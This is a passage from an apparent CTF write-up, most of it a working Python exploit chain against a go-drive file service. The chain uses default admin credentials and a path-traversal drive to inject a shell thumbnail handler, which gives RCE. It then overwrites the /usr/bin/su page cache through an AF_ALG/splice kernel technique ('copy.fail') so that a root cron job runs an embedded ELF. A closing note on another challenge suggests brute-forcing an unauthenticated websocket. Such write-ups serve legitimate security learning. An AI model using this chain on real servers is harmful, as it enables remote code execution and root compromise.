    },
    getReader: function (ctx, entry, start, size) {
      return 123;
    }
  };
});

Then create boom:

{
  "name": "boom",
  "enabled": true,
  "type": "script",
  "config": "{\"script\":\"evil\"}"
}

After initialization, request:

/new/thumbnail/boom/x.txt?_k=...

This triggers the panic.

Then write the command into rootish/tmp/cmd.txt and request:

/new/thumbnail/rootish/tmp/cmd.txt?_k=...

This gives stable RCE as the app user:

uid=1000(app) gid=1000(app) groups=1000(app)

Next comes privilege escalation: use copy.fail to modify su.

There is also a root cron job that periodically invokes /usr/bin/su:

*/5 * * * * root APP_SECRET="$(cat /run/secrets/www)" exec su -s /bin/bash -p www-data -c 'StorageBox put /var/www/html/db.sqlite'

Using copy.fail to replace su with an ELF under our control is therefore enough.
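Since the cron entry uses */5, the patched su runs at the next minute divisible by five, so the wait is at most five minutes. The sketch below estimates that wait; it assumes the host's timezone offset is a whole multiple of five minutes, and seconds_until_next_run is a hypothetical helper.

```python
import time

def seconds_until_next_run(now=None, period_minutes=5):
    """Seconds until the next wall-clock minute divisible by `period_minutes`."""
    period = period_minutes * 60
    now = time.time() if now is None else now
    return period - (now % period)

print(round(seconds_until_next_run()))
```

This is why the exploit's default polling timeout of 420 seconds, which exceeds one full cron period, is long enough.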

EXP:

#!/usr/bin/env python3
import argparse
import json
import time
import urllib.error
import urllib.parse
import urllib.request

DEFAULT_USER = "admin"
DEFAULT_PASSWORD = "123456"
ROOTISH = "rootish"
BOOM = "boom"
CMD_PATH = f"{ROOTISH}/tmp/cmd.txt"
THUMB_MAPPING = f"pwn:{ROOTISH}/tmp/*.txt"

# Minimal ELF executed as root by cron's `su` call.
# Behavior:
#   /bin/sh -c 'cat /root/0-0/flag>/app/data/local/test/f;chmod 644 /app/data/local/test/f'
ROOT_WRITER_ELF_HEX = (
    "7f454c4602010100000000000000000002003e00010000007800400000000000"
    "4000000000000000300100000000000000000000400038000100400003000200"
    "0100000007000000780000000000000078004000000000007800400000000000"
    "a000000000000000a00000000000000008000000000000004831d2488d357600"
    "0000488d3d1500000048c7c03b0000000f054831ff48c7c03c0000000f052f62"
    "696e2f7368002d6300636174202f726f6f742f302d302f666c61673e2f617070"
    "2f646174612f6c6f63616c2f746573742f663b63686d6f6420363434202f6170"
    "702f646174612f6c6f63616c2f746573742f6600900f1f009e00400000000000"
    "a600400000000000a9004000000000000000000000000000002e736873747274"
    "6162002e74657874000000000000000000000000000000000000000000000000"
    "0000000000000000000000000000000000000000000000000000000000000000"
    "0000000000000000000000000b00000001000000070000000000000078004000"
    "000000007800000000000000a000000000000000000000000000000008000000"
    "0000000000000000000000000100000003000000000000000000000000000000"
    "0000000018010000000000001100000000000000000000000000000001000000"
    "000000000000000000000000"
)

EVIL_SCRIPT = r"""/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
  return {
    meta: function (ctx) { return {}; },
    get: function (ctx, path) {
      if (path === '' || path === '/') {
        return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
      }
      if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
      return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
    },
    list: function (ctx, path) {
      return [this.get(ctx, 'x.txt')];
    },
    getReader: function (ctx, entry, start, size) {
      return 123;
    }
  };
});
"""

SHELL_HANDLER_BLOCK = """    - type: shell
      tags: pwn
      file-types: txt
      config:
        shell: /bin/sh
        mime-type: text/plain
        write-content: "1"
        max-size: "-1"
        timeout: 10m
"""

COPY_FAIL_PATCH_CMD = r"""
python3 - <<'PY'
import os
import socket

hexs = """ + repr(ROOT_WRITER_ELF_HEX) + r"""
blob = bytes.fromhex(hexs)

def d(x):
    return bytes.fromhex(x)

def poke(path, blob):
    fd = os.open(path, 0)
    h = 279
    for off in range(0, len(blob), 4):
        c = blob[off:off + 4]
        a = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
        a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
        a.setsockopt(h, 1, d("0800010000000010" + "0" * 64))
        a.setsockopt(h, 5, None, 4)
        u, _ = a.accept()
        z = b"\x00"
        u.sendmsg(
            [b"A" * 4 + c],
            [(h, 3, z * 4), (h, 2, b"\x10" + z * 19), (h, 4, b"\x08" + z * 3)],
            32768,
        )
        r, w = os.pipe()
        os.splice(fd, w, off + 4, offset_src=0)
        os.splice(r, u.fileno(), off + 4)
        try:
            u.recv(8 + off)
        except Exception:
            pass
    print("PATCHED_SU", len(blob), flush=True)

poke("/usr/bin/su", blob)
PY
"""

def normalize_base(base):
    base = base.rstrip("/")
    if base.endswith("/new"):
        api_base = base
        root_base = base[:-4]
    else:
        api_base = base + "/new"
        root_base = base
    return api_base, root_base

class Exploit:
    def __init__(self, api_base, root_base, user, password, verbose=True):
        self.api_base = api_base
        self.root_base = root_base
        self.user = user
        self.password = password
        self.token = None
        self.verbose = verbose

    def log(self, *parts):
        if self.verbose:
            print("[*]", *parts, flush=True)

    def req(self, path, method="GET", data=None, headers=None, timeout=30):
        if headers is None:
            headers = {}
        if data is not None and not isinstance(data, (bytes, bytearray)):
            data = data.encode()
        r = urllib.request.Request(self.api_base + path, data=data, headers=headers, method=method)
        try:
            with urllib.request.urlopen(r, timeout=timeout) as resp:
                return resp.read().decode("utf-8", "ignore"), resp.status
        except urllib.error.HTTPError as e:
            return e.read().decode("utf-8", "ignore"), e.code

    def api(self, path, method="GET", data=None, ctype="application/json", timeout=30):
        headers = {"Authorization": self.token}
        if data is not None:
            headers["Content-Type"] = ctype
        if ctype == "application/json" and data is not None and not isinstance(data, str):
            data = json.dumps(data)
        return self.req(path, method=method, data=data, headers=headers, timeout=timeout)

    def auth(self):
        last_err = None
        for attempt in range(10):
            self.log(f"initializing token, attempt {attempt + 1}")
            body, status = self.req("/auth/init", method="POST")
            if status != 200 or not body.strip():
                last_err = f"/auth/init failed: HTTP {status} {body!r}"
                time.sleep(1)
                continue
            try:
                self.token = json.loads(body)["token"]
            except Exception as e:
                last_err = f"/auth/init response could not be parsed: {body!r} ({e})"
                time.sleep(1)
                continue

            self.log("logging in to the go-drive admin panel")
            body, status = self.req(
                "/auth/login",
                method="POST",
                data=json.dumps({"username": self.user, "password": self.password}),
                headers={"Authorization": self.token, "Content-Type": "application/json"},
            )
            if status == 200:
                return
            last_err = f"login failed: HTTP {status} {body}"
            time.sleep(1)
        raise RuntimeError(last_err or "authentication failed")

    def get_entry(self, path):
        body, status = self.api("/entry/" + path)
        if status != 200:
            raise RuntimeError(f"failed to get entry: {path} -> HTTP {status} {body}")
        return json.loads(body)

    def get_content(self, path):
        entry = self.get_entry(path)
        key = entry["meta"]["accessKey"]
        body, status = self.req("/content/" + path + "?_k=" + urllib.parse.quote(key, safe=""))
        if status != 200:
            raise RuntimeError(f"failed to read content: {path} -> HTTP {status} {body}")
        return body

    def save_file(self, path, content):
        js = f"""
var tf = newTempFile();
tf.Write(newBytes({json.dumps(content)}));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, {json.dumps(path)}, tf.Size(), true, tf);
log('saved=' + e.Path());
"""
        body, status = self.api("/admin/jobs/script-eval", method="POST", data=js, ctype="text/plain", timeout=60)
        if status != 200:
            raise RuntimeError(f"failed to write file: {path} -> HTTP {status} {body}")
        return body

    def ensure_rootish(self):
        self.log("ensuring the rootish drive exists")
        desired = {
            "name": ROOTISH,
            "enabled": True,
            "type": "fs",
            "config": "{\"path\":\"../../../../\"}",
        }
        self.api("/admin/drive", method="POST", data=desired)
        self.api(f"/admin/drive/{ROOTISH}", method="PUT", data=desired)
        self.api(f"/admin/drive/{ROOTISH}/init-config", method="POST")
        self.api(f"/admin/drive/{ROOTISH}/init", method="POST", data="{}", ctype="application/json")
        self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
        self.get_entry(f"{ROOTISH}/app/config.yml")

    def ensure_shell_handler(self):
        self.log("injecting the shell thumbnail handler")
        cfg_path = f"{ROOTISH}/app/config.yml"
        cfg = self.get_content(cfg_path)
        if "type: shell\n      tags: pwn" not in cfg:
            marker = "      #  padding: 10\n"
            if marker not in cfg:
                raise RuntimeError("config insertion point not found; the config.yml format may have changed")
            cfg = cfg.replace(marker, marker + SHELL_HANDLER_BLOCK, 1)
            self.save_file(f"{ROOTISH}/app/config.yml.bak.exp", self.get_content(cfg_path))
            self.save_file(cfg_path, cfg)

        self.log("setting handlersMapping")
        body, status = self.api(
            "/admin/options",
            method="PUT",
            data={"thumbnail.handlersMapping": THUMB_MAPPING},
        )
        if status != 200:
            raise RuntimeError(f"failed to write options: HTTP {status} {body}")

    def ensure_boom(self):
        self.log("writing the evil script drive")
        self.save_file(f"{ROOTISH}/app/data/script-drives/evil.js", EVIL_SCRIPT)

        desired = {
            "name": BOOM,
            "enabled": True,
            "type": "script",
            "config": "{\"script\":\"evil\"}",
        }
        self.api("/admin/drive", method="POST", data=desired)
        self.api(f"/admin/drive/{BOOM}", method="PUT", data=desired)
        self.api(f"/admin/drive/{BOOM}/init-config", method="POST")
        self.api(f"/admin/drive/{BOOM}/init", method="POST", data="{}", ctype="application/json")
        self.api("/admin/drives/reload", method="POST", data="{}", ctype="application/json")
        self.get_entry(f"{BOOM}/x.txt")

    def trigger_restart(self):
        self.log("triggering the boom thumbnail to force a go-drive restart")
        entry = self.get_entry(f"{BOOM}/x.txt")
        key = entry["meta"]["accessKey"]
        self.req("/thumbnail/" + f"{BOOM}/x.txt" + "?_k=" + urllib.parse.quote(key, safe=""), timeout=10)
        self.wait_service_back()

    def wait_service_back(self):
        self.log("waiting for go-drive to come back")
        for _ in range(15):
            try:
                self.auth()
                return
            except Exception:
                time.sleep(1)
        raise RuntimeError("go-drive did not come back in time")

    def shell_cmd(self, cmd):
        self.save_file(CMD_PATH, cmd.rstrip("\n") + "\n")
        entry = self.get_entry(CMD_PATH)
        key = entry["meta"]["accessKey"]
        body, status = self.req("/thumbnail/" + CMD_PATH + "?_k=" + urllib.parse.quote(key, safe=""), timeout=120)
        return body, status

    def verify_rce(self):
        self.log("verifying shell RCE as app")
        body, status = self.shell_cmd("whoami\nid\npwd")
        if status != 200 or "uid=" not in body:
            raise RuntimeError(f"RCE verification failed: HTTP {status} {body}")
        self.log("RCE OK")

    def patch_su_pagecache(self):
        self.log("overwriting the /usr/bin/su page cache with the copy.fail technique")
        body, status = self.shell_cmd(COPY_FAIL_PATCH_CMD)
        if status != 200 or "PATCHED_SU" not in body:
            raise RuntimeError(f"copy.fail patch failed: HTTP {status} {body}")

    def poll_flag(self, timeout=420, interval=5):
        self.log("polling /ancient/f until the root cron job drops the flag")
        deadline = time.time() + timeout
        urls = [
            self.root_base + "/ancient/f",
            self.root_base + "/data/f",
        ]
        while time.time() < deadline:
            for url in urls:
                try:
                    with urllib.request.urlopen(url, timeout=10) as resp:
                        body = resp.read().decode("utf-8", "ignore")
                        text = body.strip()
                        if "flag{" in text.lower() or "actf{" in text.lower():
                            return text
                        if text and "File Download Service" not in text and "<html" not in text.lower():
                            return text
                except Exception:
                    pass
            time.sleep(interval)
        raise RuntimeError("polling timed out; the flag has not appeared yet")

def main():
    parser = argparse.ArgumentParser(description="Exploit Real DLsite and print the flag")
    parser.add_argument("--base", required=True, help="base URL, e.g. http://host:port or http://host:port/new")
    parser.add_argument("--user", default=DEFAULT_USER)
    parser.add_argument("--password", default=DEFAULT_PASSWORD)
    parser.add_argument("--timeout", type=int, default=420, help="flag polling timeout in seconds")
    args = parser.parse_args()

    api_base, root_base = normalize_base(args.base)
    exp = Exploit(api_base, root_base, args.user, args.password)

    exp.auth()
    exp.ensure_rootish()
    exp.ensure_shell_handler()
    exp.ensure_boom()
    exp.trigger_restart()
    exp.verify_rce()
    exp.patch_su_pagecache()
    flag = exp.poll_flag(timeout=args.timeout)
    print(flag)

if __name__ == "__main__":
    main()

master of album

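The websocket has no authentication, so any token can be used against it, and the challenge uses a static flag.

That means unlimited attempts: with enough tries it will eventually be solved.

Alternatively, have an AI write a script to scrape the question bank.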

License: CC BY 4.0